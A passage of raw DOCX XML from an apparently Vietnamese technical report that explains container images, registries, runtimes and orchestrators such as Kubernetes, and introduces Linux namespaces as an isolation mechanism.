        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kho </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lưu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trữ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Registry) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thành</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cốt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lõi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hệ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sinh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Trong </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đó</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Container Image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đóng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trò</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>như</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mẫu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (blueprints) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chứa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toàn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bộ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tĩnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hệ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thống</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tệp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thiết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khởi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tạo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ứng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lý</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phối</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mẫu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Container Registry </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đóng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trò</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hệ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thống</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lưu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trữ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trung</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>như</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B106C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker Hub hay Harbo</w:t>
      </w:r>
      <w:r w:rsidR="006A3013">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D27D49" w14:textId="6E7868E9" w:rsidR="00C05E16" w:rsidRDefault="004908F6" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E5132B" wp14:editId="7AEA783D">
            <wp:extent cx="3771133" cy="2488618"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="1377328859" name="Picture 5" descr="About Registries, Repositories, Images, and Artifacts - Azure Container  Registry | Microsoft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About Registries, Repositories, Images, and Artifacts - Azure Container  Registry | Microsoft Lear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82025" cy="2495806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F1B72D" w14:textId="17AD3A18" w:rsidR="004908F6" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc233498138"/>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7</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t xml:space="preserve">. Mô hình hoạt động của một public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3A5044EF" w14:textId="69F7DD4F" w:rsidR="00817518" w:rsidRPr="00817518" w:rsidRDefault="00817518" w:rsidP="00817518">
      <w:r w:rsidRPr="00817518">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00817518">
        <w:t>ontainer Runtime (Docker, containerd, CRI-O) quản lý toàn bộ vòng đời container bằng cách trừu tượng hóa tương tác với nhân hệ điều hành. Hệ thống điều phối (Kubernetes, Nomad) tự động hóa việc triển khai và quản lý cụm ứng dụng, đảm bảo tính sẵn sàng cao và khả năng chịu lỗi thông qua các tính năng như cân bằng tải và tự động mở rộng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BA634" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="004908F6" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E245B22" wp14:editId="73983E4C">
            <wp:extent cx="4142630" cy="2684932"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1261143888" name="Picture 6" descr="What is Container Orchestration? 7 Benefits and 4 To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What is Container Orchestration? 7 Benefits and 4 Tools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60998" cy="2696837"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B3D2E" w14:textId="20CCC43D" w:rsidR="009D772B" w:rsidRPr="00C05E16" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc233498139"/>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8</w:t>
      </w:r>
      <w:r w:rsidR="00671F8E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Cách hoạt động của các trình điều phối</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="53A6CDC6" w14:textId="0630FDF8" w:rsidR="009D772B" w:rsidRPr="009E0111" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc233498087"/>
      <w:r w:rsidRPr="009E0111">
        <w:lastRenderedPageBreak/>
        <w:t>Các cơ chế cô lập cốt lõi của Linux Kernel trong Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0FA107EC" w14:textId="066C3E07" w:rsidR="002F52EA" w:rsidRPr="009E0111" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc233498088"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Linux Namespaces (Không gian tên)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
